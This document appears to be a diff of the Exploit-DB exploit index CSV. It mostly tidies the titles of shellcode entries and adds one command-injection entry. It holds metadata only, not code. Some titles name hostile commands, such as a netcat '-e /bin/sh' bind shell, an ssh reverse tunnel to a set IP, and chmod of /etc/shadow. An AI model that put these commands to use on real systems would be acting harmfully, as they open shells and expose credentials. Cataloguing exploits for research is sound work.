Sedalo",lin_x86,shellcode,0 -13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 shadow ENCRYPT Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13428,platforms/lin_x86/shellcode/13428.c,"Linux/x86 - Add User (t00r) Anti-IDS Shellcode (116 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 +13429,platforms/lin_x86/shellcode/13429.c,"Linux/x86 - chmod 666 /etc/shadow Anti-IDS Shellcode (75 bytes)",2004-09-26,"Matias Sedalo",lin_x86,shellcode,0 13430,platforms/lin_x86/shellcode/13430.c,"Linux/x86 - symlink . /bin/sh Shellcode (32 bytes)",2004-09-26,dev0id,lin_x86,shellcode,0 13431,platforms/lin_x86/shellcode/13431.c,"Linux/x86 - kill snort Shellcode (151 bytes)",2004-09-26,nob0dy,lin_x86,shellcode,0 13432,platforms/lin_x86/shellcode/13432.c,"Linux/x86 - Shared Memory exec Shellcode (50 bytes)",2004-09-26,sloth,lin_x86,shellcode,0 @@ -15897,18 +15898,18 @@ id,file,description,date,author,platform,type,port 13447,platforms/lin_x86/shellcode/13447.c,"Linux/x86 - execve /bin/sh setreuid(12_12) Shellcode (50 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13448,platforms/lin_x86/shellcode/13448.c,"Linux/x86 - Bind 5074/TCP Shellcode (92 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13449,platforms/lin_x86/shellcode/13449.c,"Linux/x86 - Bind 5074/TCP + fork() Shellcode (130 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User 't00r' Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13450,platforms/lin_x86/shellcode/13450.c,"Linux/x86 - Add User (t00r) Shellcode (82 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13451,platforms/lin_x86/shellcode/13451.c,"Linux/x86 - Add User Shellcode (104 bytes)",2004-09-12,"Matt Conover",lin_x86,shellcode,0 13452,platforms/lin_x86/shellcode/13452.c,"Linux/x86 - break chroot Shellcode (34 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 13453,platforms/lin_x86/shellcode/13453.c,"Linux/x86 - break chroot Shellcode (46 bytes)",2004-09-12,dev0id,lin_x86,shellcode,0 13454,platforms/lin_x86/shellcode/13454.c,"Linux/x86 - break chroot execve /bin/sh Shellcode (80 bytes)",2004-09-12,preedator,lin_x86,shellcode,0 -13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh encrypted Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh xor encrypted Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 +13455,platforms/lin_x86/shellcode/13455.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (58 bytes)",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 +13456,platforms/lin_x86/shellcode/13456.c,"Linux/x86 - execve /bin/sh (XOR Encoded) Shellcode (55 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13457,platforms/lin_x86/shellcode/13457.c,"Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes)",2004-09-12,anonymous,lin_x86,shellcode,0 13458,platforms/lin_x86/shellcode/13458.c,"Linux/x86 - setreuid(0_0) + execve /bin/sh Shellcode (46+ bytes)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 13459,platforms/lin_x86/shellcode/13459.c,"Linux/x86 - chroot()/execve() code Shellcode (80 bytes)",2001-01-13,preedator,lin_x86,shellcode,0 13460,platforms/lin_x86/shellcode/13460.c,"Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)",2000-08-08,anonymous,lin_x86,shellcode,0 -13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User 'z' Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 +13461,platforms/lin_x86/shellcode/13461.c,"Linux/x86 - Add User (z) Shellcode (70 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13462,platforms/lin_x86/shellcode/13462.c,"Linux/x86 - break chroot setuid(0) + /bin/sh Shellcode (132 bytes)",2000-08-07,anonymous,lin_x86,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 @@ -16058,8 +16059,8 @@ id,file,description,date,author,platform,type,port 13728,platforms/lin_x86/shellcode/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve (_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,lin_x86,shellcode,0 13729,platforms/win_x86-64/shellcode/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,win_x86-64,shellcode,0 13730,platforms/lin_x86/shellcode/13730.c,"Linux/x86 - unlink _/etc/shadow_ Shellcode (33 bytes)",2010-06-02,gunslinger_,lin_x86,shellcode,0 -13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - hard / unclean reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 -13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - hard / unclean reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 +13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - Hard / Unclean Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 +13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - Hard / Unclean Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0 @@ -16080,13 +16081,13 @@ id,file,description,date,author,platform,type,port 14139,platforms/arm/shellcode/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",arm,shellcode,0 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL); (XOR 88 encoded) Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14216,platforms/lin_x86/shellcode/14216.c,"Linux/x86 - Bind Shell 64533 Shellcode (97 bytes)",2010-07-05,Magnefikko,lin_x86,shellcode,0 -14218,platforms/linux/shellcode/14218.c,"Linux - Drop suid shell root in /tmp/.hiddenshell Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14218,platforms/linux/shellcode/14218.c,"Linux - Drop SUID Root Shell (/tmp/.hiddenshell) Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14219,platforms/linux/shellcode/14219.c,"Linux - setreuid(0_0) execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14221,platforms/windows/shellcode/14221.html,"Safari 4.0.5 - 5.0.0 (Windows XP / 7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode",2010-07-05,"Alexey Sintsov",windows,shellcode,0 14234,platforms/linux/shellcode/14234.c,"Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 -14235,platforms/linux/shellcode/14235.c,"Linux - _nc -lp 31337 -e /bin//sh_ Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 +14235,platforms/linux/shellcode/14235.c,"Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0 14261,platforms/arm/shellcode/14261.c,"ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",arm,shellcode,0 -14276,platforms/linux/shellcode/14276.c,"Linux - Find all writeable folder in filesystem polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 +14276,platforms/linux/shellcode/14276.c,"Linux - Find All Writeable Folder In FileSystem Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,linux,shellcode,0 14288,platforms/win_x86/shellcode/14288.asm,"Win32 - Write-to-file Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",win_x86,shellcode,0 14305,platforms/lin_x86-64/shellcode/14305.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes)",2010-07-09,10n1z3d,lin_x86-64,shellcode,0 14332,platforms/lin_x86/shellcode/14332.c,"Linux/x86 - Bind Shell Netcat 8080/TCP Shellcode (75 bytes)",2010-07-11,blake,lin_x86,shellcode,0 @@ -16130,8 +16131,8 @@ id,file,description,date,author,platform,type,port 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0 -18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + add user 'iph' Without Password to /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0 -18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 +18294,platforms/lin_x86/shellcode/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode",2011-12-31,pentesters.ir,lin_x86,shellcode,0 +18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For PHP/HTML Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 18585,platforms/lin_x86-64/shellcode/18585.s,"Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)",2012-03-12,0_o,lin_x86-64,shellcode,0 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0 20196,platforms/lin_x86/shellcode/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0 @@ -16141,9 +16142,9 @@ id,file,description,date,author,platform,type,port 40363,platforms/win_x86/shellcode/40363.c,"Windows x86 - Bind TCP Password Protected Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 22489,platforms/windows/shellcode/22489.cpp,"Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)",2012-11-05,b33f,windows,shellcode,0 40890,platforms/win_x86-64/shellcode/40890.c,"Windows x64 - Bind Shell TCP Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 -23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 +23622,platforms/lin_x86/shellcode/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",lin_x86,shellcode,0 24318,platforms/windows/shellcode/24318.c,"Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,windows,shellcode,0 -25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 +25497,platforms/lin_x86/shellcode/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337) Shellcode (92 bytes)",2013-05-17,"Russell Willis",lin_x86,shellcode,0 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell 4444/TCP Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0 @@ -16158,7 +16159,7 @@ id,file,description,date,author,platform,type,port 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 -34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 +34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (81 bytes / 96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 @@ -16172,7 +16173,7 @@ id,file,description,date,author,platform,type,port 36359,platforms/lin_x86-64/shellcode/36359.c,"Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0 36391,platforms/lin_x86/shellcode/36391.c,"Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36393,platforms/lin_x86/shellcode/36393.c,"Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 -36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map google.com to 127.1.1.1 Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 +36394,platforms/lin_x86/shellcode/36394.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36395,platforms/lin_x86/shellcode/36395.c,"Linux/x86 - execve(_/bin/sh_) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36397,platforms/lin_x86/shellcode/36397.c,"Linux/x86 - Reverse TCP Shell Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 36398,platforms/lin_x86/shellcode/36398.c,"Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0 @@ -16206,11 +16207,11 @@ id,file,description,date,author,platform,type,port 37393,platforms/lin_x86/shellcode/37393.asm,"Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",lin_x86,shellcode,0 37401,platforms/lin_x86-64/shellcode/37401.asm,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",lin_x86-64,shellcode,0 37427,platforms/lin_x86-64/shellcode/37427.txt,"Linux/x86-64 - execve Encoded Shellcode (57 bytes)",2015-06-29,"Bill Borskey",lin_x86-64,shellcode,0 -37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh ROT7 Encoded Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 +37495,platforms/lin_x86/shellcode/37495.py,"Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode",2015-07-05,"Artem T",lin_x86,shellcode,0 37664,platforms/win_x86/shellcode/37664.c,"Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,win_x86,shellcode,0 37749,platforms/lin_x86/shellcode/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",lin_x86,shellcode,0 37758,platforms/win_x86/shellcode/37758.c,"Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,win_x86,shellcode,0 -37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 +37762,platforms/lin_x86/shellcode/37762.py,"Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode",2015-08-12,"Anastasios Monachos",lin_x86,shellcode,0 37895,platforms/win_x86-64/shellcode/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",win_x86-64,shellcode,0 38065,platforms/osx/shellcode/38065.txt,"OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 @@ -16234,7 +16235,7 @@ id,file,description,date,author,platform,type,port 39204,platforms/lin_x86/shellcode/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39312,platforms/lin_x86-64/shellcode/39312.c,"Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)",2016-01-25,"Sathish kumar",lin_x86-64,shellcode,0 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - reverse_tcp (192.168.1.29:4444) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 -39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - tcp_bind Port 4444 Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 +39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0 39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - shell_reverse_tcp Password Polymorphic Shellcode (2) (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0 @@ -16271,7 +16272,7 @@ id,file,description,date,author,platform,type,port 40005,platforms/win_x86/shellcode/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40026,platforms/lin_x86/shellcode/40026.txt,"Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",lin_x86,shellcode,0 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind NetCat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 +40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0 @@ -16284,7 +16285,7 @@ id,file,description,date,author,platform,type,port 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - Bind Netcat with Port Shellcode (44/52 bytes)",2016-07-29,Kyzer,lin_x86,shellcode,0 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 -40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse zsh 9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 +40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - Reverse ZSH 127.255.255.254:9090/TCP Shellcode (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0 40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 40259,platforms/win_x86/shellcode/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 @@ -16300,10 +16301,10 @@ id,file,description,date,author,platform,type,port 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0 -41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 -41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 +41183,platforms/linux/shellcode/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0 +41220,platforms/linux/shellcode/41220.c,"Linux - Reverse Shell Multi/Dual Mode Shellcode (Genearator) (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 -41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 +41375,platforms/linux/shellcode/41375.c,"Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0 @@ -16314,8 +16315,8 @@ id,file,description,date,author,platform,type,port 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0 41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 -41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse NetCat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 -41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse NetCat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 +41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 +41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0 41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 @@ -32904,7 +32905,7 @@ id,file,description,date,author,platform,type,port 32455,platforms/php/webapps/32455.pl,"Website Directory - 'index.php' Cross-Site Scripting",2008-10-03,"Ghost Hacker",php,webapps,0 32459,platforms/java/webapps/32459.txt,"VeriSign Kontiki Delivery Management System 5.0 - 'action' Parameter Cross-Site Scripting",2008-10-05,"Mazin Faour",java,webapps,0 32461,platforms/php/webapps/32461.txt,"AmpJuke 0.7.5 - 'index.php' SQL Injection",2008-10-03,S_DLA_S,php,webapps,0 -32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - HTTP POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 +32462,platforms/php/webapps/32462.txt,"Simple Machines Forum (SMF) 1.1.6 - POST Request Filter Security Bypass",2008-10-06,WHK,php,webapps,0 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - 'edit.php' File Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 @@ -38120,3 +38121,10 @@ id,file,description,date,author,platform,type,port 42284,platforms/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,hardware,webapps,0 42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0 42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0 +42306,platforms/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps,0 